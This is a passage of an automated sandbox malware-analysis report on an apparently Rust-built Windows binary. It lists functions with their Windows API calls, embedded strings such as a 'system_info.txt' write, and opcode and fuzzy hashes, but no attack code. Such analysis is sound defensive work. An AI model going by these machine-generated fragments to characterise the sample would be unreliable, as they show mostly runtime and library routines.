                                        • Associated: 00000000.00000002.2423798690.00007FF7F415B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff7f4100000_9KEZfGRjyK.jbxd
                                        Similarity
                                        • API ID: ErrorLast$FullNamePath
                                        • String ID:
                                        • API String ID: 2482867836-0
                                        • Opcode ID: ba76eefd639af96dec1f28aa9424d795c10072416cba78c9c45828c53f0cbe8d
                                        • Instruction ID: e967665515c4240ccca38238d0242b41ea0612656aa97e05e70c4014a9eeafee
                                        • Opcode Fuzzy Hash: ba76eefd639af96dec1f28aa9424d795c10072416cba78c9c45828c53f0cbe8d
                                        • Instruction Fuzzy Hash: 2BB18F62A04BC18AEB65AF26E8847E8A655FB04BD8F904231DE2C9B7D5DF38D3458350
                                        Function 00007FF7F41286B0 Relevance: 7.8, APIs: 5, Instructions: 253COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2423701109.00007FF7F4101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4100000, based on PE: true
                                        • Associated: 00000000.00000002.2423680582.00007FF7F4100000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2423734929.00007FF7F4140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2423774744.00007FF7F415A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2423798690.00007FF7F415B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff7f4100000_9KEZfGRjyK.jbxd
                                        Similarity
                                        • API ID: ErrorLast$FullNamePath
                                        • String ID:
                                        • API String ID: 2482867836-0
                                        • Opcode ID: 3312637ff695d0fd956b92b6b936942761c90b43967c05ecb60f82c5b0f61ac3
                                        • Instruction ID: 2419fa39953ed2d9d49ab18101d480e645910375c4227f3fda036cec668eb697
                                        • Opcode Fuzzy Hash: 3312637ff695d0fd956b92b6b936942761c90b43967c05ecb60f82c5b0f61ac3
                                        • Instruction Fuzzy Hash: 2FB18062E047C28AEB35AF27EC847A9A254FB44BD8F844235DE6C5B7D5DF3893418350
                                        Function 00007FF7F4115290 Relevance: 7.7, APIs: 5, Instructions: 191COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2423701109.00007FF7F4101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4100000, based on PE: true
                                        • Associated: 00000000.00000002.2423680582.00007FF7F4100000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2423734929.00007FF7F4140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2423774744.00007FF7F415A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2423798690.00007FF7F415B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff7f4100000_9KEZfGRjyK.jbxd
                                        Similarity
                                        • API ID: ErrorLast$EnvironmentVariable
                                        • String ID:
                                        • API String ID: 2691138088-0
                                        • Opcode ID: 40a8af77cb83e711465423b7e4295d1b533cfbe4621878e8606779f8fa624747
                                        • Instruction ID: 2cc7f42ea650c690f0443abe1df9007d0d3f2f02f783af67ee3c77fcfa64fe73
                                        • Opcode Fuzzy Hash: 40a8af77cb83e711465423b7e4295d1b533cfbe4621878e8606779f8fa624747
                                        • Instruction Fuzzy Hash: 4A81E762E04BC18AFB719F26E9843E9A365FB447E8F804131DE6C5B7D5DF3892818350
                                        Function 00007FF7F4127D20 Relevance: 7.7, APIs: 5, Instructions: 169COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2423701109.00007FF7F4101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4100000, based on PE: true
                                        • Associated: 00000000.00000002.2423680582.00007FF7F4100000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2423734929.00007FF7F4140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2423774744.00007FF7F415A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2423798690.00007FF7F415B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff7f4100000_9KEZfGRjyK.jbxd
                                        Similarity
                                        • API ID: ConsoleErrorLastWrite$ByteCharMultiWide
                                        • String ID:
                                        • API String ID: 1956605914-0
                                        • Opcode ID: 9b792ba087b754caaed6a68868abe4804498491c3c59dfb27f505c1cfb20efb0
                                        • Instruction ID: fca68316ef41fc24987bb97c520737359ab4d59a5cc4463f9c11dc5c570203fc
                                        • Opcode Fuzzy Hash: 9b792ba087b754caaed6a68868abe4804498491c3c59dfb27f505c1cfb20efb0
                                        • Instruction Fuzzy Hash: 5B51A521E0C69386F760AF22F8843FAA651FB45794F844135D97D87AE4EF3C968583A0
                                        Function 00007FF7F411FB70 Relevance: 7.7, APIs: 5, Instructions: 155COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2423701109.00007FF7F4101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4100000, based on PE: true
                                        • Associated: 00000000.00000002.2423680582.00007FF7F4100000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2423734929.00007FF7F4140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2423774744.00007FF7F415A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2423798690.00007FF7F415B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff7f4100000_9KEZfGRjyK.jbxd
                                        Similarity
                                        • API ID: ErrorLast$FileModuleName
                                        • String ID:
                                        • API String ID: 1026760046-0
                                        • Opcode ID: f01fb9a2bc57b3d2b1039f647bb717d38f054ee20f4b73a6f2b0038690f7b895
                                        • Instruction ID: d5a51adb58331aa3c806e7a6ba621dd1d0ebec21a423dfce3d617dee42f33fc1
                                        • Opcode Fuzzy Hash: f01fb9a2bc57b3d2b1039f647bb717d38f054ee20f4b73a6f2b0038690f7b895
                                        • Instruction Fuzzy Hash: A951D662E08BC14BEB71AF27F8847F9A268BB45BE4F904135DD6C466D5EF389281C350
                                        Function 00007FF7F4114EE0 Relevance: 7.7, APIs: 5, Instructions: 154COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2423701109.00007FF7F4101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4100000, based on PE: true
                                        • Associated: 00000000.00000002.2423680582.00007FF7F4100000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2423734929.00007FF7F4140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2423774744.00007FF7F415A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2423798690.00007FF7F415B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff7f4100000_9KEZfGRjyK.jbxd
                                        Similarity
                                        • API ID: ErrorLast$CurrentDirectory
                                        • String ID:
                                        • API String ID: 3993060814-0
                                        • Opcode ID: a71a4c22c91586a61734b4bf9cdfccbd620d121b6fd3e40877aba937771e1c0d
                                        • Instruction ID: 6888e77cf9a752977818f80b7318bdb7a10fd99383ead1420c4c0d3ccc5035d4
                                        • Opcode Fuzzy Hash: a71a4c22c91586a61734b4bf9cdfccbd620d121b6fd3e40877aba937771e1c0d
                                        • Instruction Fuzzy Hash: FB51D662E04BC24BF771AF67F8843A9A268BB44BE8F804135DD6C467D5DF3CA2858350
                                        Function 00007FF7F4126B40 Relevance: 7.5, APIs: 5, Instructions: 46COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2423701109.00007FF7F4101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4100000, based on PE: true
                                        • Associated: 00000000.00000002.2423680582.00007FF7F4100000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2423734929.00007FF7F4140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2423774744.00007FF7F415A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2423798690.00007FF7F415B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff7f4100000_9KEZfGRjyK.jbxd
                                        Similarity
                                        • API ID: ErrorHandleLast$CurrentDuplicateProcess
                                        • String ID:
                                        • API String ID: 3697983210-0
                                        • Opcode ID: a84996ec7724e0f27e3750ae2423f6fd2eb7d8270aa4a0a9ba7a348fda5a6813
                                        • Instruction ID: 75b16608f92de88d7bfc3dca5d9ceec2691e94833267c1e5fa23c2623e0ff2a7
                                        • Opcode Fuzzy Hash: a84996ec7724e0f27e3750ae2423f6fd2eb7d8270aa4a0a9ba7a348fda5a6813
                                        • Instruction Fuzzy Hash: A8118F71E0C74687FB20AF63F4843BAA651EB457A8F904230D97D467C4DF7CE14482A0
                                        Function 00007FF7F411C4F0 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 267COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2423701109.00007FF7F4101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4100000, based on PE: true
                                        • Associated: 00000000.00000002.2423680582.00007FF7F4100000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2423734929.00007FF7F4140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2423774744.00007FF7F415A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2423798690.00007FF7F415B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff7f4100000_9KEZfGRjyK.jbxd
                                        Similarity
                                        • API ID: AddressSingleWake
                                        • String ID: <unnamed>$Box<dyn Any>aborting due to panic at $main
                                        • API String ID: 3114109732-896199136
                                        • Opcode ID: 0026388bcf7ca5048021ae864d0e4a43bbb5f126b99ceda82b88653c6e9fc59c
                                        • Instruction ID: 267995a80e0cc546c91ff009a4fd4cafa4df0e9c4d5d9a7ecf35c53e7a61d793
                                        • Opcode Fuzzy Hash: 0026388bcf7ca5048021ae864d0e4a43bbb5f126b99ceda82b88653c6e9fc59c
                                        • Instruction Fuzzy Hash: 9FD19222E08B4186FB50AF2AE4C03B967B4EB95798F940532DA6D477D4DF3DE055C3A0
                                        Function 00007FF7F4139D58 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 154COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2423701109.00007FF7F4101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4100000, based on PE: true
                                        • Associated: 00000000.00000002.2423680582.00007FF7F4100000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2423734929.00007FF7F4140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2423774744.00007FF7F415A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2423798690.00007FF7F415B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff7f4100000_9KEZfGRjyK.jbxd
                                        Similarity
                                        • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                        • String ID: csm
                                        • API String ID: 2395640692-1018135373
                                        • Opcode ID: 1073ff76e281692413ab2b7aa27f58aec6c4a35b0489a6cc94ddb9ff7625e67e
                                        • Instruction ID: a574582355123ecbb7bf4bc9a75fe9e05e22e6e30a9bd9664306c8223fb3bc3b
                                        • Opcode Fuzzy Hash: 1073ff76e281692413ab2b7aa27f58aec6c4a35b0489a6cc94ddb9ff7625e67e
                                        • Instruction Fuzzy Hash: 7951B132F296028BDB14EF16F084679B795EB40B88F814134EA6A477C8EF3CE841D790
                                        Function 00007FF7F413A0A4 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 31COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2423701109.00007FF7F4101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4100000, based on PE: true
                                        • Associated: 00000000.00000002.2423680582.00007FF7F4100000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2423734929.00007FF7F4140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2423774744.00007FF7F415A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2423798690.00007FF7F415B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff7f4100000_9KEZfGRjyK.jbxd
                                        Similarity
                                        • API ID: terminate
                                        • String ID: MOC$RCC$csm
                                        • API String ID: 1821763600-2671469338
                                        • Opcode ID: 7452083ed9cb36d213407fe42873fc44bc2a82579146da1c61ef2b8bef4380e9
                                        • Instruction ID: af840b05aaa46cc2c46bb17373057f555267cf17cf827866dbfd6e6e862ccb1e
                                        • Opcode Fuzzy Hash: 7452083ed9cb36d213407fe42873fc44bc2a82579146da1c61ef2b8bef4380e9
                                        • Instruction Fuzzy Hash: 79F06936D08646C7EB247F17F1C1078B260EB58780F889231D7AC0A6D2CF7CE890E6A1
                                        Function 00007FF7F41290C0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 27libraryloaderCOMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2423701109.00007FF7F4101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4100000, based on PE: true
                                        • Associated: 00000000.00000002.2423680582.00007FF7F4100000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2423734929.00007FF7F4140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2423774744.00007FF7F415A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2423798690.00007FF7F415B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff7f4100000_9KEZfGRjyK.jbxd
                                        Similarity
                                        • API ID: AddressHandleModuleProc
                                        • String ID: SetThreadDescription$kernel32
                                        • API String ID: 1646373207-1950310818
                                        • Opcode ID: 413311be91697036f5db5f8af35ed6315efe56a155240f357945624ab3dea04c
                                        • Instruction ID: aa43875352245bcbf809fbd6a9ac5c3a73c06500cfc4423590572e04f0724bf3
                                        • Opcode Fuzzy Hash: 413311be91697036f5db5f8af35ed6315efe56a155240f357945624ab3dea04c
                                        • Instruction Fuzzy Hash: 69F01D50F59A42D6FB15AF47F9C40A0A6A06F09BE0FC44036CD2D527E4AF2CA649C2A0
                                        Function 00007FF7F4121460 Relevance: 6.1, APIs: 4, Instructions: 103COMMON
                                        Download Yara Rule
                                        APIs
                                        • CancelIo.KERNEL32(?,?,?,?,?,?,?,00000000,00000000,?,00007FF7F410F97D,?,?,00000000,00000000,?), ref: 00007FF7F4121488
                                        • GetOverlappedResult.KERNEL32(?,?,?,?,?,?,?,00000000,00000000,?,00007FF7F410F97D,?,?,00000000,00000000,?), ref: 00007FF7F41214AA
                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,00000000,00000000,?,00007FF7F410F97D,?,?,00000000,00000000,?), ref: 00007FF7F41214BC
                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,00000000,00000000,?,00007FF7F410F97D,?,?,00000000,00000000,?), ref: 00007FF7F4121528
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2423701109.00007FF7F4101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4100000, based on PE: true
                                        • Associated: 00000000.00000002.2423680582.00007FF7F4100000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2423734929.00007FF7F4140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2423774744.00007FF7F415A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2423798690.00007FF7F415B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff7f4100000_9KEZfGRjyK.jbxd
                                        Similarity
                                        • API ID: ErrorLast$CancelOverlappedResult
                                        • String ID:
                                        • API String ID: 3836860830-0
                                        • Opcode ID: a884bd1a06d4c2eb8e9cbb3695207d8384306ba8dfc3dcae3472e3a9cd46b628
                                        • Instruction ID: 76ef9b8c474ed2900398b8b52660e550cbe294f3a9993c5df71ebaa366071834
                                        • Opcode Fuzzy Hash: a884bd1a06d4c2eb8e9cbb3695207d8384306ba8dfc3dcae3472e3a9cd46b628
                                        • Instruction Fuzzy Hash: CC417032E18A4186F710DF66E8803AD67A0BB95794F544631DE6E437D4DF78D581C3A0
                                        Function 00007FF7F4122BA8 Relevance: 6.1, APIs: 4, Instructions: 94COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2423701109.00007FF7F4101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4100000, based on PE: true
                                        • Associated: 00000000.00000002.2423680582.00007FF7F4100000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2423734929.00007FF7F4140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2423774744.00007FF7F415A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2423798690.00007FF7F415B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff7f4100000_9KEZfGRjyK.jbxd
                                        Similarity
                                        • API ID: ErrorLast$DirectorySystem
                                        • String ID:
                                        • API String ID: 860285823-0
                                        • Opcode ID: eb39d9dc3ab494b94e2d1b0ffc44216c63ff8d20ddcc7591486e24af19e69c66
                                        • Instruction ID: aa328f2bfa2ffbf893b9a1fe08cfb7e4038a692ca8de87679ca275103e108140
                                        • Opcode Fuzzy Hash: eb39d9dc3ab494b94e2d1b0ffc44216c63ff8d20ddcc7591486e24af19e69c66
                                        • Instruction Fuzzy Hash: A441C925E04ED186E774AF37EC843BE6291BB04755F904135D96DCBBC8DF2C96408350
                                        Function 00007FF7F41210D0 Relevance: 6.1, APIs: 4, Instructions: 83COMMON
                                        Download Yara Rule
                                        APIs
                                        • CreateEventW.KERNEL32(?,?,?,00000000,?,?,?,00007FF7F4120D5D), ref: 00007FF7F4121100
                                        • GetLastError.KERNEL32(?,?,?,00000000,?,?,?,00007FF7F4120D5D), ref: 00007FF7F412115D
                                        • CloseHandle.KERNEL32(?,?,?,?,?,?,?,00000000,?,?,?,00007FF7F4120D5D), ref: 00007FF7F41211CE
                                        • CloseHandle.KERNEL32(?,?,?,?,?,?,?,00000000,?,?,?,00007FF7F4120D5D), ref: 00007FF7F41211D4
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2423701109.00007FF7F4101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4100000, based on PE: true
                                        • Associated: 00000000.00000002.2423680582.00007FF7F4100000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2423734929.00007FF7F4140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2423774744.00007FF7F415A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2423798690.00007FF7F415B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff7f4100000_9KEZfGRjyK.jbxd
                                        Similarity
                                        • API ID: CloseHandle$CreateErrorEventLast
                                        • String ID:
                                        • API String ID: 3743700123-0
                                        • Opcode ID: 19626a39ad0d5ba7b181dd2f40a95146c2c1a4e072f003b6bbab82c629dff18b
                                        • Instruction ID: 5ac0756513a522e9b28f3f14373220072631dcdb582127a5e8717d1d48854804
                                        • Opcode Fuzzy Hash: 19626a39ad0d5ba7b181dd2f40a95146c2c1a4e072f003b6bbab82c629dff18b
                                        • Instruction Fuzzy Hash: 9D217133B04B4186F7259F27F8407A9AA64FB897A4F584235DFAD127D0EF3895D28350
                                        Function 00007FF7F413E574 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 190COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        • use of std::thread::current() is not possible after the thread's local data has been destroyedlibrary\std\src\thread\mod.rs, xrefs: 00007FF7F413E8BC
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2423701109.00007FF7F4101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4100000, based on PE: true
                                        • Associated: 00000000.00000002.2423680582.00007FF7F4100000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2423734929.00007FF7F4140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2423774744.00007FF7F415A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2423798690.00007FF7F415B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff7f4100000_9KEZfGRjyK.jbxd
                                        Similarity
                                        • API ID: AddressWake$Single
                                        • String ID: use of std::thread::current() is not possible after the thread's local data has been destroyedlibrary\std\src\thread\mod.rs
                                        • API String ID: 1135737206-63010627
                                        • Opcode ID: 8a86cd98932279247778391f93ff708e004df7436a706d6f3d3cea724bd37281
                                        • Instruction ID: 5fb73ddf7664aa2c8ef219dd8e1b4bd530d9e4c49acae66898dfb4dcbedf18fd
                                        • Opcode Fuzzy Hash: 8a86cd98932279247778391f93ff708e004df7436a706d6f3d3cea724bd37281
                                        • Instruction Fuzzy Hash: 45915E25E4C74686FB51EF1AF8C13BAA7A0AF54794F844231D92D432E1DF2EA485D3A0
                                        Function 00007FF7F413EA94 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 83COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2423701109.00007FF7F4101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4100000, based on PE: true
                                        • Associated: 00000000.00000002.2423680582.00007FF7F4100000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2423734929.00007FF7F4140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2423774744.00007FF7F415A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2423798690.00007FF7F415B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff7f4100000_9KEZfGRjyK.jbxd
                                        Similarity
                                        • API ID: AddressWake
                                        • String ID: system_info.txtFailed to write to file:
                                        • API String ID: 98804233-2426490079
                                        • Opcode ID: cafdba6228075f100baa5bb20edf4749aba7be72585362519b9a1f3a86e265ea
                                        • Instruction ID: fa8d31e304c4d367d766b49b188b84bc5b15c31fa821522986d66625a7c77e4e
                                        • Opcode Fuzzy Hash: cafdba6228075f100baa5bb20edf4749aba7be72585362519b9a1f3a86e265ea
                                        • Instruction Fuzzy Hash: B2317032D0870187F722AF16F89437AB690EB45354F804535CB9E466E0DF7DE486D3A0
                                        Function 00007FF7F41165B0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 72COMMON
                                        Download Yara Rule
                                        Strings
                                        • use of std::thread::current() is not possible after the thread's local data has been destroyedlibrary\std\src\thread\mod.rs, xrefs: 00007FF7F4116574
                                        • lock count overflow in reentrant mutexlibrary\std\src\sync\reentrant_lock.rs, xrefs: 00007FF7F411658C
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2423701109.00007FF7F4101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4100000, based on PE: true
                                        • Associated: 00000000.00000002.2423680582.00007FF7F4100000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2423734929.00007FF7F4140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2423774744.00007FF7F415A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2423798690.00007FF7F415B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff7f4100000_9KEZfGRjyK.jbxd
                                        Similarity
                                        • API ID: AddressSingleWake
                                        • String ID: lock count overflow in reentrant mutexlibrary\std\src\sync\reentrant_lock.rs$use of std::thread::current() is not possible after the thread's local data has been destroyedlibrary\std\src\thread\mod.rs
                                        • API String ID: 3114109732-122189663
                                        • Opcode ID: 64d5a3d3fa18f3a3fc433c4ccd56d879ed2de9446630ab22567387b405544f65
                                        • Instruction ID: bb474584f5870a14201bcb446905aad4a7d6965d59c7361a5c535bce44e9a21b
                                        • Opcode Fuzzy Hash: 64d5a3d3fa18f3a3fc433c4ccd56d879ed2de9446630ab22567387b405544f65
                                        • Instruction Fuzzy Hash: 3231C732F09A119AFB50EF66E8813FC6774AB84758F948635CE2C127D4EF399586C390
                                        Function 00007FF7F4139CB0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON
                                        Download Yara Rule
                                        APIs
                                        • RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF7F412B590), ref: 00007FF7F4139D00
                                        • RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF7F412B590), ref: 00007FF7F4139D41
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2423701109.00007FF7F4101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4100000, based on PE: true
                                        • Associated: 00000000.00000002.2423680582.00007FF7F4100000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2423734929.00007FF7F4140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2423774744.00007FF7F415A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2423798690.00007FF7F415B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff7f4100000_9KEZfGRjyK.jbxd
                                        Similarity
                                        • API ID: ExceptionFileHeaderRaise
                                        • String ID: csm
                                        • API String ID: 2573137834-1018135373
                                        • Opcode ID: e5c20127fb61fcfa79ca1083f679c47f420afe444f066555bc0ec0915a8c86cb
                                        • Instruction ID: 1670c03089c43cb2dff58e3a952d406e3972570238ece305a640d72f702684f2
                                        • Opcode Fuzzy Hash: e5c20127fb61fcfa79ca1083f679c47f420afe444f066555bc0ec0915a8c86cb
                                        • Instruction Fuzzy Hash: 00113072A18B4182EB619F16F480269B7E5FB88B94F984234DE9D077A8EF3CD551C740